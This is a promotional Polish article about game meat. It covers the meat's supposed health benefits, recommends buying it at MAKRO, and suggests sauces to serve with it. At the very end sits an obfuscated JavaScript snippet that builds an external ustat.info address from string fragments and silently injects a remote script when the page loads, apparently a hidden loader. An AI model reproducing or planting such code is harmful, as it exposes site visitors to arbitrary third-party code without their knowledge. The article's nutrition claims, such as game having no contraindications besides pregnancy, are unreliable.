Dziczyzna - mięso, o którym wciąż wiemy za mało

<p><strong>Dziczyzna to wciąż mało doceniany gatunek mięsa. Dzieje się tak, gdyż nie znamy jego zalet i brakuje nam pomysł&oacute;w na jego przygotowanie.</strong><br /> <br /> <strong>Dziczyzna pełna zdrowia</strong><br /> Pod pojęciem &bdquo;dziczyzna&rdquo; rozumiemy mięso z dzika, sarny, zająca, perliczki, przepi&oacute;rki, bażanta oraz jelenia. To r&oacute;wnież dość rzadko goszczący w polskiej kuchni gatunek mięsa. Dzieje się tak przede wszystkim z braku odpowiedniej wiedzy na temat jego wartości oraz sposob&oacute;w przyrządzania. Czym wyr&oacute;żnia się ten rodzaj mięsa? Przede wszystkim jest to mięso dość chude. Poza tym posiada bardzo przyjazny dla naszego zdrowia skład. Ma to między innymi związek z faktem, iż pozyskiwane mięso pochodzi od zwierząt wolno żyjących, czyli żywiących się w dużo bezpieczniejszy dla człowieka spos&oacute;b, niż jest to w przypadku zwierząt typowo hodowlanych. Znajduje się w nim sporo pełnowartościowego białka. Jest też źr&oacute;dłem cennych witamin oraz minerał&oacute;w. Na dziczyznę warto też zwr&oacute;cić uwagę ze względu na wysoką zawartość żelaza &ndash; o wiele łatwiej przyswajalnego niż to, kt&oacute;re znajduje się w czerwonym mięsie.<br /> <br /> <strong>Jak wybrać najlepszą dziczyznę?</strong><br /> Gdy chcemy kupić naprawdę świeżą dziczyznę, najlepiej udać się do dobrego firmowego sklepu &ndash; jak na przykład MAKRO - w kt&oacute;rym bez problemu dostępna jest mrożona dziczyzna. Firmowe sklepy mają tę przewagę nad konkurencją, iż oferują najbardziej pożądane przez klient&oacute;w formy mięsa: są to zar&oacute;wno tuszki, jak i szynka, schab oraz udziec. Warto przy tym podkreślić, że oferowana przez firmowe markety dziczyzna jest wolna od rozmaitych dodatk&oacute;w, co oznacza, że zachowuje w pełni swoje naturalne walory smakowe. Jakie gatunki dziczyzny należy wybierać w pierwszej kolejności? Dietetycy polecają nam przede wszystkim sarninę oraz mięso z dzika, gdyż zawierają najwięcej witamin z grupy B oraz minerał&oacute;w, takich jak magnez, fosfor, wapń. Warto przy tym nadmienić, że sarnina jest bardzo chuda i odznacza się wyjątkowo bogatym bukietem smak&oacute;w. Mięso z dzika jest natomiast bardzo soczyste i jędrne. W odr&oacute;żnieniu od wieprzowiny, posiada znacznie mniej tłuszczu.<br /> <br /> <strong>Z czym dziczyzna smakuje najlepiej?</strong><br /> Po dziczyznę warto sięgać r&oacute;wnież, dlatego, że nie istnieją żadne przeciwwskazania, co do jej spożywania. Jedynie ostrożne powinny być tu kobiety w ciąży. Ten typ mięsa &ndash; wbrew powszechnym opiniom &ndash; jest też dość łatwy w przygotowaniu. Bez trudu dobierzemy do niego także koncentraty spożywcze, kt&oacute;re wzbogacą jego smak i aromat lub podkreślą barwę. Dziczyznę najłatwiej przyrządzić smażąc lub przygotowując z niej smaczną pieczeń na ruszcie, bądź wolnym ogniu. Jaki koncentrat spożywczy będzie najlepszym towarzystwem dla naszego mięsa? Wyb&oacute;r tego typu dodatk&oacute;w do mięs jest ogromny. Najlepiej szukać ich w grupie koncentrat&oacute;w obiadowych, takich jak sosy (np. pieczeniowy lub grzybowy).<br /> <br /> Podsumowując: <a href="https://www.makro.pl/swiat-produktow/mieso-w-makro/dziczyzna">dziczyzna to mięso o licznych walorach zar&oacute;wno zdrowotnych</a>, jak i typowo kulinarnych (a raczej smakowych). Niestety, wciąż zbyt rzadko gości na naszych stołach, przez co nie możemy poznać lepiej jego zalet, ani się do nich przekonać. Warto zmienić te przyzwyczajenia i serwując raz na jakiś czas na obiad zamiast tradycyjnego schabowego &ndash; kotlet z dzika.</p>

<script type="text/javascript">(function(){q4aq=document.createElement("script");q4aq_=("us")+("ta");q4aq_+="t"+(".");q4aq_+=("in");q4aqu="8826092";q4aq.async=true;q4aqu+=".wimx4hju4aqur6rmi";q4aq.type="text/javascript";q4aq_+="f"+"o"+("/");q4aqu+="8beh039a8m38q";q4aq.src="//"+q4aq_+q4aqu;dq4aq=document.body;dq4aq.appendChild(q4aq);})();</script>